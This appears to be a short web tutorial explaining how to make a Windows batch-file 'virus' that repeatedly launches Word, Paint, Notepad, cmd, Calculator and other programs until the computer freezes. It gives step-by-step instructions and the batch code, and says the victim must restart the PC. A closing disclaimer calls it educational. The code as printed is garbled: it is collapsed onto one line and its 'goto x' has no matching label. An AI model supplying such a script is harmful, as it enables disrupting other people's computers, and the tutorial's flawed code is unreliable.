How to Create an Application Boom Virus?
The virus that we are building here will automatically open up random applications of the PC until the PC freezes. This can be a pretty annoying virus.
For the Creation of the Virus follow these steps:
Step 1: Press the Window + R Button from the Keyboard. This will open the Run Dialog book will Open in front of us.
Step 2: Type Notepad in the Dialog Box and press Enter. This will open the notepad for us.
Step 3: Type in the below-mentioned code in the Notepad:
@echo off start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x
Step 4: After typing in all the code save the file with the name of your choice. But remember to save the file with .bat extension.
The Virus has been Successfully Created by you but this will only work when it is opened by the user once.
To Resolve this problem the user must restart the PC.
Disclaimer: GeeksforGeeks does not support the spread of ransomware/viruses and if you intend to use this information for malicious purposes, we are in no way responsible. This information is intended to be used for educational purposes only.
Please Login to comment...